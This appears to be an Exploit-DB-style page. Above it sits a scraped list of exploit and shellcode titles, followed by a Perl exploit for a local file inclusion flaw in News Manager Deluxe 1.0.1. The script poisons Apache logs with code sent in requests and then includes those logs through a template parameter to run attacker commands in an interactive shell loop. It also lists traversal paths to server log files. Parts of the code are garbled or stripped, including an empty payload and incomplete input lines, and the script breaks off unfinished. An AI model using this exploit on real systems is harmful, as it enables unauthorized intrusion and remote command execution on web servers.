
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
109 lines
No EOL
3.6 KiB
Perl
Executable file
109 lines
No EOL
3.6 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/23499/info
|
||
|
||
News Manager Deluxe is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
|
||
|
||
Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
|
||
|
||
This issue affects News Manager Deluxe 1.0.1; other versions may also be affected.
|
||
|
||
# Perl
|
||
#
|
||
# BeyazKurt B3yazKurt@Hotmail.Com
|
||
#
|
||
# NMDeluxe 1.0.1 (template) Local File Inclusion Exploit
|
||
#
|
||
# D0rk : "powered by NMDeluxe" dorka gerenk yok ama nese :p
|
||
#
|
||
# D<>n trojen yedim a.q ! baska t<>rl<72> yapamaz zate lamerler
|
||
#
|
||
# Download : http://wsdeluxe.com/nmdeluxe/downloads.html Your Name & Site URL :p
|
||
#
|
||
#Coded by elden ele ge? :)
|
||
#
|
||
|
||
use IO::Socket;
|
||
use LWP::Simple;
|
||
#ripped
|
||
@apache=(
|
||
"../../../../../var/log/httpd/access_log",
|
||
"../../../../../var/log/httpd/error_log",
|
||
"../apache/logs/error.log",
|
||
"../apache/logs/access.log",
|
||
"../../apache/logs/error.log",
|
||
"../../apache/logs/access.log",
|
||
"../../../apache/logs/error.log",
|
||
"../../../apache/logs/access.log",
|
||
"../../../../apache/logs/error.log",
|
||
"../../../../apache/logs/access.log",
|
||
"../../../../../apache/logs/error.log",
|
||
"../../../../../apache/logs/access.log",
|
||
"../logs/error.log",
|
||
"../logs/access.log",
|
||
"../../logs/error.log",
|
||
"../../logs/access.log",
|
||
"../../../logs/error.log",
|
||
"../../../logs/access.log",
|
||
"../../../../logs/error.log",
|
||
"../../../../logs/access.log",
|
||
"../../../../../logs/error.log",
|
||
"../../../../../logs/access.log",
|
||
"../../../../../etc/httpd/logs/access_log",
|
||
"../../../../../etc/httpd/logs/access.log",
|
||
"../../../../../etc/httpd/logs/error_log",
|
||
"../../../../../etc/httpd/logs/error.log",
|
||
"../../.. /../../var/www/logs/access_log",
|
||
"../../../../../var/www/logs/access.log",
|
||
"../../../../../usr/local/apache/logs/access_log",
|
||
"../../../../../usr/local/apache/logs/access.log",
|
||
"../../../../../var/log/apache/access_log",
|
||
"../../../../../var/log/apache/access.log",
|
||
"../../../../../var/log/access_log",
|
||
"../../../../../var/www/logs/error_log",
|
||
"../../../../../var/www/logs/error.log",
|
||
"../../../../../usr/local/apache/logs/error_log",
|
||
"../../../../../usr/local/apache/logs/error.log",
|
||
"../../../../../var/log/apache/error_log",
|
||
"../../../../../var/log/apache/error.log",
|
||
"../../../../../var/log/access_log",
|
||
"../../../../../var/log/error_log"
|
||
);
|
||
if (@ARGV < 3) {
|
||
print "
|
||
NMDeluxe 1.0.1 (template) Local File Inclusion Exploit
|
||
###############################################################
|
||
Kullan.m : beyazkurt.pl [victim] [apachepath]
|
||
###############################################################
|
||
";
|
||
exit();
|
||
}
|
||
$host=$ARGV[0];
|
||
$path=$ARGV[1];
|
||
$apachepath=$ARGV[2];
|
||
print "Code is injecting in logfiles...\n";
|
||
$CODE="";
|
||
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host",
|
||
PeerPort=>"80") or die "Connection failed.\n\n";
|
||
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
|
||
print $socket "user-Agent: ".$CODE."\r\n";
|
||
print $socket "Host: ".$host."\r\n";
|
||
print $socket "Connection: close\r\n\r\n";
|
||
close($socket);
|
||
print "Write END to exit!\n";
|
||
print "If not working try another apache path\n\n";
|
||
print "[shell] ";$cmd = ;
|
||
while($cmd !~ "END") {
|
||
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host",
|
||
PeerPort=>"80") or die "Connection failed.\n\n";
|
||
#now include parameter
|
||
print $socket "GET
|
||
".$path."/includes/footer.php?template=".$apache[$apachepath]."%00&cmd=$cmd
|
||
HTTP/1.1\r\n";
|
||
print $socket "Host: ".$host."\r\n";
|
||
print $socket "Accept: */*\r\n";
|
||
print $socket "Connection: close\r\n\r\n";
|
||
while ($raspuns = <$socket>)
|
||
{
|
||
print $raspuns;
|
||
}
|
||
print "[shell] ";
|
||
$cmd = ; |